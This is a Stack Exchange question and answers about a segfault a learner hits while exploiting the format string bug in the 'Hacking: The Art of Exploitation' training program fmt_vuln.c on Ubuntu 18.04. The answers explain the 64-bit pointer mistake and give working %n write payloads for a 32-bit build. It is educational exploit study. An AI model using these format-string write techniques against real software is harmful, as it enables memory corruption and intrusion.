# Unable to exploit format string vulenrability on Ubuntu 18.04.2 LTS

Tags: linux, c, exploit

I am studying from "Hacking: The Art of Exploitation" and in program [fmt_vuln.c](https://github.com/intere/hacking/blob/master/booksrc/fmt_vuln.c) format string is exploited. I am getting `Segmentation Fault` error.

Checking position of `AAAA` on stack:

```
$ ./fmt_vuln AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAA55756260.f7dd18c0.f7af4154.00000000.f7b523a0.ffffdfe8.ffffdb30.41414141
[*] test_val @ 0x555555755010 = -72 0xffffffb8
```

Witing to `test_value` address

```
$ ./fmt_vuln $(printf "\x10\x50\x75\x55")%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n
The right way to print user-controlled input:
PuU%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n
The wrong way to print user-controlled input:
Segmentation fault (core dumped)
```

As suggested in [this answer](https://stackoverflow.com/a/27214598/6810253) I have disabled ASLR and compiled without stack protection.

Comment: Maybe stack canaries?

Comment: Questions on Stack Exchange sites must stand on their own; as this is in effect a debugging question it must include the actual code directly, not as a link.

Answer (score 1, accepted):

As @Chris Stratton already said, you don't give the right pointer value - you want to put `\x10\x50\x75\x55\x55\x55\x00\x00` as that value. Your segfault comes from instruction:

```
mov dword [rax], r13d
```

where `rax` = `0x7838302555755010`, which confirms that you need to put these `4` extra bytes (to overwrite `78383025` part). I do not know however how you can pass `NULL` bytes in bash as an argument.

As a workaround, you can compile this program for `32`bit architecture using `-m32` option in GCC. Then use:

```
./fmt_vuln AAAA%08x.%08x.%08x.%08x
```

to get:

```
[*] test_val @ 0x56557008 = -72 0xffffffb8
```

and then:

```
./fmt_vuln $(printf "\x08\x70\x55\x56")%08x.%08x.%08x.%n
```

and finally you get:

```
[*] test_val @ 0x56557008 = 31 0x0000001f
```

**Note:** when in doubt, just run your program in a debugger (I used [radare2](https://rada.re/r/) for instance) - this way you can get the instruction causing segfault and you can see register values at that moment.

Answer (score 0):

> [*] test_val @ 0x555555755010 = -72 0xffffffb8

This shows us that you are on a 64 bit system.

> $ ./fmt_vuln $(printf "\x10\x50\x75\x55")%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n

Yet you attempt to supply only the low 32-bits as your pointer value.  Whatever the value of the other 32-bits, they are overwhelmingly likely to be part of an invalid address.

This may not be the only thing wrong, but by itself it is a clear mistake.